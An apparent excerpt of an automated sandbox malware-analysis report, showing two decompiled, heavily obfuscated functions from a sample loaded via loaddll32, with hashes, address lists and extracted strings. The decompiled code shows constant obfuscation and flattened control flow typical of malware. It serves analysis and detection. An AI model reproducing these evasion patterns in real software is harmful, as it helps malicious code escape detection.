Instruction Fuzzy Hash: 6D2232715093809FC768CF25C58AA9BBBE2FFC5704F108A1DE6DA96260D7B18948CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D47D5B, Relevance: 12.9, Strings: 10, Instructions: 361
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00D47D5B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t420;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t488;
				void* _t489;
				signed int* _t493;

				_t493 =  &_v2792;
				_v2792 = 0x289571;
				_v2792 = _v2792 | 0xf6df9bca;
				_v2792 = _v2792 + 0xea43;
				_v2792 = _v2792 ^ 0xf7008a17;
				_v2788 = 0xdb8a78;
				_v2788 = _v2788 * 6;
				_t488 = __ecx;
				_t489 = 0x219adc7;
				_t442 = 0x7a;
				_v2788 = _v2788 / _t442;
				_t443 = 0x42;
				_v2788 = _v2788 * 0x3d;
				_v2788 = _v2788 ^ 0x0296dfb6;
				_v2660 = 0xc0a6c5;
				_v2660 = _v2660 << 6;
				_v2660 = _v2660 ^ 0x3025665c;
				_v2692 = 0x3a8fa3;
				_v2692 = _v2692 ^ 0xa120b079;
				_v2692 = _v2692 | 0x9ac88514;
				_v2692 = _v2692 ^ 0xbbd9167d;
				_v2668 = 0xec1a87;
				_v2668 = _v2668 + 0x8cab;
				_v2668 = _v2668 ^ 0x00e348c2;
				_v2628 = 0xecd9a9;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0xd9bcc0eb;
				_v2756 = 0xbae8da;
				_v2756 = _v2756 + 0xefc;
				_v2756 = _v2756 * 0x2c;
				_v2756 = _v2756 ^ 0x76eb1803;
				_v2756 = _v2756 ^ 0x56c3d905;
				_v2780 = 0x787147;
				_v2780 = _v2780 + 0xffff6597;
				_v2780 = _v2780 + 0xffffc18b;
				_v2780 = _v2780 | 0x826dfd4e;
				_v2780 = _v2780 ^ 0x827371e5;
				_v2712 = 0x74bd84;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 + 0xbcb6;
				_v2712 = _v2712 ^ 0x0001f6d9;
				_v2680 = 0x714a85;
				_v2680 = _v2680 | 0x3dc400c8;
				_v2680 = _v2680 ^ 0x3df5425d;
				_v2612 = 0xace488;
				_v2612 = _v2612 | 0xd2617c07;
				_v2612 = _v2612 ^ 0xd2e83d7d;
				_v2736 = 0x9a08fa;
				_v2736 = _v2736 + 0x9c03;
				_v2736 = _v2736 << 5;
				_v2736 = _v2736 ^ 0x135d006f;
				_v2652 = 0x41ccd2;
				_v2652 = _v2652 ^ 0x97b2ef27;
				_v2652 = _v2652 ^ 0x97fb61bc;
				_v2764 = 0x9e119e;
				_v2764 = _v2764 << 2;
				_v2764 = _v2764 | 0x268f2d0f;
				_v2764 = _v2764 / _t443;
				_v2764 = _v2764 ^ 0x009ccc86;
				_v2620 = 0x8f6e28;
				_v2620 = _v2620 >> 3;
				_v2620 = _v2620 ^ 0x00104951;
				_v2772 = 0xe21e14;
				_v2772 = _v2772 + 0xffff5b09;
				_v2772 = _v2772 * 0x18;
				_v2772 = _v2772 + 0xc00a;
				_v2772 = _v2772 ^ 0x152b5515;
				_v2608 = 0x3d3ea7;
				_v2608 = _v2608 + 0x63eb;
				_v2608 = _v2608 ^ 0x0030ec7d;
				_v2644 = 0x866304;
				_v2644 = _v2644 + 0x379c;
				_v2644 = _v2644 ^ 0x008e4788;
				_v2604 = 0xe77a6a;
				_t121 =  &_v2604; // 0xe77a6a
				_t444 = 0x63;
				_v2604 =  *_t121 / _t444;
				_v2604 = _v2604 ^ 0x000e0408;
				_v2696 = 0xf5199c;
				_v2696 = _v2696 << 8;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0xa8c2da1f;
				_v2636 = 0xbfea70;
				_v2636 = _v2636 | 0x60f37e4e;
				_v2636 = _v2636 ^ 0x60f450e6;
				_v2720 = 0x6acbb3;
				_t445 = 0x6c;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 9;
				_v2720 = _v2720 ^ 0x00013488;
				_v2704 = 0x72224f;
				_v2704 = _v2704 << 9;
				_v2704 = _v2704 + 0xffff0fb2;
				_v2704 = _v2704 ^ 0xe44ad0e5;
				_v2728 = 0xe68b79;
				_v2728 = _v2728 | 0x8e61462a;
				_v2728 = _v2728 >> 1;
				_v2728 = _v2728 ^ 0x477bf727;
				_v2616 = 0x4099b0;
				_v2616 = _v2616 + 0xfa8f;
				_v2616 = _v2616 ^ 0x0048c0a5;
				_v2688 = 0xff8ffd;
				_v2688 = _v2688 ^ 0x53972d47;
				_t446 = 0x60;
				_v2688 = _v2688 / _t446;
				_v2688 = _v2688 ^ 0x00dac0dc;
				_v2744 = 0xc2c855;
				_v2744 = _v2744 | 0x821d7436;
				_t447 = 0x65;
				_v2744 = _v2744 * 0x46;
				_v2744 = _v2744 ^ 0xc93dde39;
				_v2664 = 0x8fcf69;
				_v2664 = _v2664 ^ 0x92a1f028;
				_v2664 = _v2664 ^ 0x922e5d56;
				_v2672 = 0x138bb7;
				_v2672 = _v2672 + 0xffff6c98;
				_v2672 = _v2672 ^ 0x001bead2;
				_v2784 = 0x1d404b;
				_v2784 = _v2784 ^ 0xbb38c348;
				_v2784 = _v2784 >> 0xb;
				_v2784 = _v2784 | 0xeccea58e;
				_v2784 = _v2784 ^ 0xecdc694e;
				_v2676 = 0xbdcffc;
				_v2676 = _v2676 ^ 0x5aef785e;
				_v2676 = _v2676 ^ 0x5a57f2e1;
				_v2768 = 0xceb2dd;
				_v2768 = _v2768 | 0xafbcd5ba;
				_v2768 = _v2768 * 0xf;
				_v2768 = _v2768 / _t447;
				_v2768 = _v2768 ^ 0x00c1507c;
				_v2732 = 0xba5c67;
				_v2732 = _v2732 + 0xffff3085;
				_v2732 = _v2732 ^ 0x29fec498;
				_v2732 = _v2732 ^ 0x29414316;
				_v2740 = 0xfebc70;
				_v2740 = _v2740 >> 6;
				_t448 = 0x4c;
				_v2740 = _v2740 * 0x46;
				_v2740 = _v2740 ^ 0x01107382;
				_v2776 = 0x1fdbbd;
				_v2776 = _v2776 + 0xffff7a05;
				_v2776 = _v2776 << 5;
				_v2776 = _v2776 + 0xffff7a3d;
				_v2776 = _v2776 ^ 0x03eed3d9;
				_v2708 = 0xe5e896;
				_v2708 = _v2708 << 6;
				_v2708 = _v2708 + 0x807d;
				_v2708 = _v2708 ^ 0x3973facc;
				_v2716 = 0xdc1d9;
				_v2716 = _v2716 | 0xfc1937aa;
				_v2716 = _v2716 + 0xffffd03c;
				_v2716 = _v2716 ^ 0xfc1f97ce;
				_v2648 = 0xeb72b6;
				_v2648 = _v2648 >> 8;
				_v2648 = _v2648 ^ 0x0003133b;
				_v2724 = 0x35c70c;
				_v2724 = _v2724 + 0xffff3120;
				_v2724 = _v2724 + 0xda65;
				_v2724 = _v2724 ^ 0x003bd395;
				_v2656 = 0x588c44;
				_v2656 = _v2656 ^ 0x3c8fee8a;
				_v2656 = _v2656 ^ 0x3cdfb996;
				_v2632 = 0xa98095;
				_v2632 = _v2632 + 0xf08e;
				_v2632 = _v2632 ^ 0x00ab49e1;
				_v2640 = 0x908171;
				_v2640 = _v2640 << 0xa;
				_v2640 = _v2640 ^ 0x42069508;
				_v2748 = 0xf99537;
				_v2748 = _v2748 >> 9;
				_v2748 = _v2748 | 0x4d3f7029;
				_v2748 = _v2748 ^ 0x4d356fb4;
				_v2700 = 0xf7c115;
				_v2700 = _v2700 + 0xffffc630;
				_v2700 = _v2700 >> 5;
				_v2700 = _v2700 ^ 0x0003a618;
				_v2624 = 0xf73d89;
				_v2624 = _v2624 * 0x3f;
				_v2624 = _v2624 ^ 0x3cd41ae8;
				_v2684 = 0x237d3e;
				_v2684 = _v2684 + 0xffff7bf2;
				_v2684 = _v2684 << 0xb;
				_v2684 = _v2684 ^ 0x17c7121d;
				_v2752 = 0x3823b3;
				_v2752 = _v2752 * 0x2a;
				_v2752 = _v2752 + 0xffff9ab5;
				_v2752 = _v2752 >> 9;
				_v2752 = _v2752 ^ 0x0000d6a9;
				_v2760 = 0x9d905;
				_t420 = _v2760 / _t448;
				_v2760 = _t420;
				_v2760 = _v2760 + 0xffff5226;
				_v2760 = _v2760 ^ 0x58f88d53;
				_v2760 = _v2760 ^ 0xa70b0c4e;
				while(_t489 != 0x219adc7) {
					if(_t489 == 0x472b880) {
						E00D31A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
						_push(_v2776);
						_push(_v2740);
						_push(_v2732);
						E00D52D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0xd3196c,  &_v520,  &_v1040, E00D4E1F8(0xd3196c, _v2768, __eflags));
						E00D4FECB(_t422, _v2632, _v2640, _v2748, _v2700);
						__eflags = 0;
						return E00D485FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
					}
					_t501 = _t489 - 0x6430241;
					if(_t489 != 0x6430241) {
						L7:
						__eflags = _t489 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t420;
						}
						L10:
						return _t420;
					}
					E00D50DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
					 *((short*)(E00D409DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
					E00D3BAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
					_push(_v2620);
					_push(_v2764);
					_push(_v2652);
					E00D52D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0xd3188c,  &_v2080,  &_v2600, E00D4E1F8(0xd3188c, _v2736, _t501));
					E00D4FECB(_t434, _v2636, _v2720, _v2704, _v2728);
					_t448 = _v2616;
					_t420 = E00D3BFBE( &_v2080, _t488, _v2688);
					_t493 =  &(_t493[0x18]);
					if(_t420 != 0) {
						_t489 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t489 = 0x6430241;
				goto L7;
			}

0x00d47d5b
0x00d47d61
0x00d47d6a
0x00d47d71
0x00d47d78
0x00d47d7f
0x00d47d90
0x00d47d94
0x00d47d9a
0x00d47da1
0x00d47da6
0x00d47db1
0x00d47db2
0x00d47db6
0x00d47dbe
0x00d47dc9
0x00d47dd1
0x00d47ddc
0x00d47de4
0x00d47dec
0x00d47df4
0x00d47dfc
0x00d47e07
0x00d47e12
0x00d47e1d
0x00d47e28
0x00d47e30
0x00d47e3b
0x00d47e43
0x00d47e50
0x00d47e54
0x00d47e5c
0x00d47e64
0x00d47e6c
0x00d47e74
0x00d47e7c
0x00d47e84
0x00d47e8c
0x00d47e94
0x00d47e99
0x00d47ea1
0x00d47ea9
0x00d47eb4
0x00d47ebf
0x00d47eca
0x00d47ed5
0x00d47ee0
0x00d47eeb
0x00d47ef3
0x00d47efb
0x00d47f00
0x00d47f08
0x00d47f13
0x00d47f1e
0x00d47f29
0x00d47f31
0x00d47f36
0x00d47f44
0x00d47f48
0x00d47f50
0x00d47f5b
0x00d47f63
0x00d47f6e
0x00d47f76
0x00d47f83
0x00d47f87
0x00d47f8f
0x00d47f99
0x00d47fa4
0x00d47faf
0x00d47fba
0x00d47fc5
0x00d47fd0
0x00d47fdb
0x00d47fe6
0x00d47fef
0x00d47ff4
0x00d47ffd
0x00d48008
0x00d48010
0x00d48015
0x00d4801a
0x00d48022
0x00d4802d
0x00d48038
0x00d48043
0x00d4804f
0x00d48054
0x00d4805a
0x00d4805f
0x00d48067
0x00d4806f
0x00d48074
0x00d4807c
0x00d48084
0x00d4808c
0x00d48094
0x00d48098
0x00d480a0
0x00d480ab
0x00d480b6
0x00d480c1
0x00d480c9
0x00d480d5
0x00d480da
0x00d480e0
0x00d480e8
0x00d480f0
0x00d480fd
0x00d480fe
0x00d48102
0x00d4810a
0x00d48115
0x00d48120
0x00d4812b
0x00d48136
0x00d48141
0x00d4814c
0x00d48154
0x00d4815c
0x00d48161
0x00d48169
0x00d48171
0x00d4817c
0x00d48187
0x00d48192
0x00d4819a
0x00d481a7
0x00d481b1
0x00d481b5
0x00d481bd
0x00d481c7
0x00d481d4
0x00d481e1
0x00d481e9
0x00d481f1
0x00d481fd
0x00d481fe
0x00d48202
0x00d4820a
0x00d48212
0x00d4821a
0x00d4821f
0x00d48227
0x00d4822f
0x00d48237
0x00d4823c
0x00d48244
0x00d4824c
0x00d48254
0x00d4825c
0x00d48264
0x00d4826c
0x00d48277
0x00d4827f
0x00d4828a
0x00d48292
0x00d4829a
0x00d482a2
0x00d482aa
0x00d482b5
0x00d482c0
0x00d482cb
0x00d482d6
0x00d482e1
0x00d482ec
0x00d482f7
0x00d482ff
0x00d4830a
0x00d48312
0x00d48317
0x00d4831f
0x00d48327
0x00d4832f
0x00d48337
0x00d4833c
0x00d48344
0x00d48357
0x00d4835e
0x00d48369
0x00d48371
0x00d48379
0x00d4837e
0x00d48386
0x00d48393
0x00d48397
0x00d4839f
0x00d483a4
0x00d483ac
0x00d483b8
0x00d483ba
0x00d483be
0x00d483c6
0x00d483ce
0x00d483d6
0x00d483e4
0x00d48546
0x00d4854b
0x00d48554
0x00d48558
0x00d485a1
0x00d485c1
0x00d485d0
0x00000000
0x00d485f1
0x00d483ea
0x00d483ec
0x00d4850a
0x00d4850a
0x00d48510
0x00000000
0x00000000
0x00000000
0x00000000
0x00d485fe
0x00d485fe
0x00d485fe
0x00d48409
0x00d4842e
0x00d48452
0x00d48457
0x00d48463
0x00d48467
0x00d484b6
0x00d484d6
0x00d484e2
0x00d484f1
0x00d484f6
0x00d484fb
0x00d48501
0x00000000
0x00d48501
0x00000000
0x00d484fb
0x00d48508
0x00000000

Strings

>}#, xrefs: 00D48369
^xZ, xrefs: 00D4817C
o, xrefs: 00D47F00
O"r, xrefs: 00D48067
$P, xrefs: 00D47D8E
Gqx, xrefs: 00D47E64
)p?M, xrefs: 00D48317
\f%0, xrefs: 00D47DD1
}0, xrefs: 00D47FAF
jz, xrefs: 00D47FE6

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
API String ID: 0-1313373530
Opcode ID: aee28f8d61efb1c96371f7aefb6614ae8ee1044a1ce739bba61eb0a657ee4a71
Instruction ID: 435a2ab9befcab395cb41bfc5e777dd64c7badd1821d174fc5bae0092cd059d4
Opcode Fuzzy Hash: aee28f8d61efb1c96371f7aefb6614ae8ee1044a1ce739bba61eb0a657ee4a71
Instruction Fuzzy Hash: 0412F2715093819FD3A8CF21C94AA9BFBE2FBC5708F10891DE1D996260D7B58909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D3238C, Relevance: 11.7, Strings: 9, Instructions: 428
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00D3238C(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t472;
				void* _t474;
				void* _t477;
				void* _t481;
				void* _t496;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed int _t507;
				signed int _t537;
				signed int _t548;
				void* _t550;
				void* _t555;

				_v1584 = _v1584 & 0x00000000;
				_v1788 = 0x33fdc0;
				_v1788 = _v1788 >> 6;
				_v1788 = _v1788 + 0xffff8381;
				_v1788 = _v1788 | 0x21bcf8d5;
				_v1788 = _v1788 ^ 0x23bcfbfd;
				_v1744 = 0xdaa9b2;
				_v1744 = _v1744 >> 0xa;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 * 0xc;
				_t496 = __ecx;
				_v1744 = _v1744 ^ 0x00028d02;
				_t550 = 0x854d193;
				_v1632 = 0x7e6112;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x07e103ba;
				_v1716 = 0xd48fca;
				_v1716 = _v1716 + 0x54b9;
				_v1716 = _v1716 >> 3;
				_v1716 = _v1716 ^ 0x00172ea2;
				_v1612 = 0xc953de;
				_v1612 = _v1612 + 0xffff7488;
				_v1612 = _v1612 ^ 0x00c8e870;
				_v1660 = 0xfcf42a;
				_v1660 = _v1660 ^ 0x4c4ed76c;
				_v1660 = _v1660 ^ 0x4cb955ce;
				_v1600 = 0xa6934b;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x00032972;
				_v1604 = 0xac816b;
				_t498 = 0x70;
				_v1604 = _v1604 * 0x21;
				_v1604 = _v1604 ^ 0x16380272;
				_v1696 = 0x6f97e6;
				_v1696 = _v1696 | 0xa083c342;
				_v1696 = _v1696 ^ 0x07d73a4d;
				_v1696 = _v1696 ^ 0xa73f6dc5;
				_v1684 = 0xc2049d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 ^ 0x7749f8a8;
				_v1684 = _v1684 ^ 0x6f051565;
				_v1652 = 0xcc0992;
				_v1652 = _v1652 / _t498;
				_v1652 = _v1652 ^ 0x000062be;
				_v1644 = 0xb03f6e;
				_v1644 = _v1644 | 0x923ba096;
				_v1644 = _v1644 ^ 0x92bf0244;
				_v1596 = 0xe574f1;
				_t499 = 0x34;
				_v1596 = _v1596 * 0x7b;
				_v1596 = _v1596 ^ 0x6e3d68f9;
				_v1712 = 0x56ecc;
				_v1712 = _v1712 | 0x82f65ce8;
				_v1712 = _v1712 ^ 0x3fbbcfe7;
				_v1712 = _v1712 ^ 0xbd43ec0e;
				_v1672 = 0x17149a;
				_v1672 = _v1672 >> 3;
				_v1672 = _v1672 ^ 0x000903bb;
				_v1780 = 0xd02801;
				_v1780 = _v1780 + 0x92b0;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 ^ 0x000a2638;
				_v1680 = 0x58b587;
				_v1680 = _v1680 / _t499;
				_t500 = 0x6c;
				_v1680 = _v1680 / _t500;
				_v1680 = _v1680 ^ 0x000e92c3;
				_v1756 = 0xa3a224;
				_v1756 = _v1756 + 0xffffb0d0;
				_v1756 = _v1756 | 0x22aa770c;
				_v1756 = _v1756 ^ 0xa1e09b61;
				_v1756 = _v1756 ^ 0x83433f26;
				_v1772 = 0x502a69;
				_v1772 = _v1772 + 0xf56b;
				_v1772 = _v1772 ^ 0x45c826e2;
				_v1772 = _v1772 << 3;
				_v1772 = _v1772 ^ 0x2cc29674;
				_v1704 = 0x78c4c8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 >> 0xb;
				_v1704 = _v1704 ^ 0x000284d1;
				_v1636 = 0x5a1a48;
				_v1636 = _v1636 | 0x49fffb3e;
				_v1636 = _v1636 ^ 0x49fe8be8;
				_v1740 = 0xbf037f;
				_v1740 = _v1740 << 0xe;
				_t501 = 0x25;
				_v1740 = _v1740 / _t501;
				_v1740 = _v1740 | 0xccccb3e4;
				_v1740 = _v1740 ^ 0xcdfabced;
				_v1688 = 0x95b1ca;
				_v1688 = _v1688 ^ 0x177e4a6b;
				_v1688 = _v1688 | 0x2f1db7c3;
				_v1688 = _v1688 ^ 0x3ffaee54;
				_v1592 = 0x55c9d;
				_v1592 = _v1592 + 0x6a7d;
				_v1592 = _v1592 ^ 0x0009fe3c;
				_v1628 = 0x3a227c;
				_v1628 = _v1628 + 0x86b1;
				_v1628 = _v1628 ^ 0x003b89cb;
				_v1588 = 0x8f964;
				_v1588 = _v1588 ^ 0xa28705c5;
				_v1588 = _v1588 ^ 0xa2875abd;
				_v1748 = 0xfacc7e;
				_v1748 = _v1748 >> 7;
				_v1748 = _v1748 << 5;
				_v1748 = _v1748 * 0x52;
				_v1748 = _v1748 ^ 0x141cbb89;
				_v1668 = 0x1ea707;
				_v1668 = _v1668 >> 9;
				_v1668 = _v1668 ^ 0x0009aede;
				_v1620 = 0x6a93f9;
				_v1620 = _v1620 * 0x2f;
				_v1620 = _v1620 ^ 0x139d0c16;
				_v1732 = 0xe0254d;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 + 0x8d90;
				_v1732 = _v1732 ^ 0x6e303e8a;
				_v1732 = _v1732 ^ 0x6e36b510;
				_v1764 = 0x8f9e28;
				_v1764 = _v1764 | 0x05ab8c08;
				_v1764 = _v1764 ^ 0x1f734d6b;
				_v1764 = _v1764 | 0x4c44fbff;
				_v1764 = _v1764 ^ 0x5ed9dcbf;
				_v1664 = 0x89ae50;
				_v1664 = _v1664 + 0xffff7042;
				_v1664 = _v1664 ^ 0x008bcf93;
				_v1720 = 0x59414f;
				_v1720 = _v1720 ^ 0xb8de2fa2;
				_v1720 = _v1720 << 3;
				_v1720 = _v1720 ^ 0xc43925a0;
				_v1776 = 0x701ae5;
				_v1776 = _v1776 * 0x2f;
				_v1776 = _v1776 + 0xffff7ac3;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 ^ 0x000eab5b;
				_v1784 = 0xc6ba99;
				_v1784 = _v1784 + 0xffff3dc8;
				_v1784 = _v1784 + 0xfffff02f;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0x17a755e4;
				_v1648 = 0x49cca0;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x7324fd9e;
				_v1656 = 0xf258c2;
				_v1656 = _v1656 >> 9;
				_v1656 = _v1656 ^ 0x0001b893;
				_v1792 = 0x2c7b35;
				_t265 =  &_v1792; // 0x2c7b35
				_t502 = 0x5b;
				_v1792 =  *_t265 * 0xd;
				_v1792 = _v1792 << 2;
				_v1792 = _v1792 + 0x1495;
				_v1792 = _v1792 ^ 0x090f1a77;
				_v1768 = 0xbf4508;
				_v1768 = _v1768 / _t502;
				_v1768 = _v1768 * 0x7b;
				_v1768 = _v1768 * 0x6c;
				_v1768 = _v1768 ^ 0x6d142a82;
				_v1640 = 0xd70bb;
				_v1640 = _v1640 + 0xffffb965;
				_v1640 = _v1640 ^ 0x000d3816;
				_v1752 = 0x745b9d;
				_v1752 = _v1752 >> 0xb;
				_v1752 = _v1752 + 0xde80;
				_v1752 = _v1752 + 0xffff3192;
				_v1752 = _v1752 ^ 0x0008925b;
				_v1760 = 0xacf8cd;
				_v1760 = _v1760 + 0xffff9672;
				_v1760 = _v1760 | 0xf153a794;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x00f89a8f;
				_v1736 = 0x809c29;
				_v1736 = _v1736 + 0xffffec2c;
				_v1736 = _v1736 | 0xf5f6afdc;
				_v1736 = _v1736 ^ 0xe29e6862;
				_v1736 = _v1736 ^ 0x176fe90e;
				_v1692 = 0x187f09;
				_v1692 = _v1692 ^ 0xea03092e;
				_v1692 = _v1692 + 0x8629;
				_v1692 = _v1692 ^ 0xea1b0891;
				_v1616 = 0xdadf05;
				_v1616 = _v1616 >> 3;
				_v1616 = _v1616 ^ 0x001b90e7;
				_v1700 = 0x255f4a;
				_v1700 = _v1700 + 0x19d8;
				_v1700 = _v1700 * 0x77;
				_v1700 = _v1700 ^ 0x1164c06a;
				_v1728 = 0x19a192;
				_v1728 = _v1728 | 0x5ed50fa2;
				_v1728 = _v1728 + 0xffff411c;
				_v1728 = _v1728 | 0x02c614be;
				_v1728 = _v1728 ^ 0x5edf5bbc;
				_v1608 = 0x401b2;
				_v1608 = _v1608 | 0xbe85eb48;
				_v1608 = _v1608 ^ 0xbe8cf33f;
				_v1676 = 0x1ae3ab;
				_v1676 = _v1676 | 0xf7e0dbb3;
				_v1676 = _v1676 >> 4;
				_v1676 = _v1676 ^ 0x0f7cac70;
				_v1724 = 0xfdfaa3;
				_v1724 = _v1724 + 0xbcd0;
				_v1724 = _v1724 | 0x4b62528b;
				_v1724 = _v1724 ^ 0x4bf9131d;
				_v1708 = 0x8383c7;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 + 0xffff26cd;
				_v1708 = _v1708 ^ 0x002bd4f5;
				_v1624 = 0xf208a5;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0xf20fbad4;
				_t548 = _v1584;
				while(1) {
					L1:
					_t503 = 0x5394512;
					L2:
					while(_t550 != 0x36274) {
						if(_t550 == 0x34d5b0c) {
							_push(_t503);
							_t477 = E00D485FF(_v1736, _v1692, __eflags,  &_v1580, 0,  &_v1564, _v1616, 0, _v1700);
							__eflags = _t477;
							if(_t477 == 0) {
								L26:
								return _t477;
							}
							E00D51538(_v1728, _v1608, _v1580);
							_t537 = _v1724;
							_push(_v1576);
							_t507 = _v1676;
							L25:
							return E00D51538(_t507, _t537);
						}
						if(_t550 == 0x37ad1c9) {
							_t537 = _v1624;
							_push(_v1584);
							_t507 = _v1708;
							goto L25;
						}
						if(_t550 == _t503) {
							_push(_v1792);
							_t481 = E00D4017B( &_v1564, _v1776, _t503, _v1784, _v1648, _v1584,  &_v1580, _v1656);
							_t555 = _t555 + 0x20;
							__eflags = _t481;
							if(__eflags != 0) {
								E00D51538(_v1768, _v1640, _v1580);
								E00D51538(_v1752, _v1760, _v1576);
							}
							L14:
							_t550 = 0x37ad1c9;
							while(1) {
								L1:
								_t503 = 0x5394512;
								goto L2;
							}
						}
						if(_t550 == 0x854d193) {
							_t550 = 0x36274;
							continue;
						}
						if(_t550 == 0x9c7608b) {
							E00D50DB1(_v1696,  &_v1044, __eflags, _v1684, _t503, _v1652);
							 *((short*)(E00D409DD(_v1644,  &_v1044, _v1596, _v1712))) = 0;
							E00D3BAA9(_v1672, _v1780, __eflags, _v1680, _v1756,  &_v524);
							_push(_v1740);
							_push(_v1636);
							_push(_v1704);
							E00D52D0A(_v1592, __eflags,  &_v524, _v1628, _v1588, _v1748, 0xd318bc,  &_v1564,  &_v1044, E00D4E1F8(0xd318bc, _v1772, __eflags));
							E00D4FECB(_t488, _v1668, _v1620, _v1732, _v1764);
							_t555 = _t555 + 0x58;
							__eflags = E00D3BFBE( &_v1564, _t496, _v1720);
							if(__eflags != 0) {
								_t474 = 0x2f41e48;
								__eflags = _t548 - 0x2f41e48;
								_t503 = 0x5394512;
								_t550 =  ==  ? 0x5394512 : 0x34d5b0c;
								continue;
							}
							goto L14;
						}
						if(_t550 != 0xf62a168) {
							L20:
							__eflags = _t550 - 0x4f1a594;
							if(__eflags != 0) {
								continue;
							}
							return _t474;
						}
						if(_t548 != _t474) {
							_t550 = 0x9c7608b;
							continue;
						}
						_push(_v1788);
						_push( &_v1584);
						_t477 = E00D49774(_v1612, _v1660, _v1600, _t503, _v1604, _t503);
						_t555 = _t555 + 0x18;
						if(_t477 == 0) {
							goto L26;
						}
						_t550 = 0x9c7608b;
						goto L1;
					}
					_t472 = E00D4C387(_t503);
					__eflags = _t472 - E00D4BC6B();
					_t474 = 0x2f41e48;
					_t550 = 0xf62a168;
					_t548 =  !=  ? 0x2f41e48 : 0x95df4e1;
					_t503 = 0x5394512;
					goto L20;
				}
			}

0x00d32392
0x00d3239c
0x00d323a4
0x00d323a9
0x00d323b1
0x00d323b9
0x00d323c1
0x00d323c9
0x00d323ce
0x00d323dc
0x00d323e0
0x00d323e2
0x00d323ea
0x00d323ef
0x00d323fa
0x00d32402
0x00d3240d
0x00d32415
0x00d3241d
0x00d32422
0x00d3242a
0x00d32435
0x00d32440
0x00d3244b
0x00d32456
0x00d32461
0x00d3246c
0x00d32477
0x00d3247f
0x00d3248a
0x00d3249f
0x00d324a2
0x00d324a9
0x00d324b4
0x00d324bc
0x00d324c4
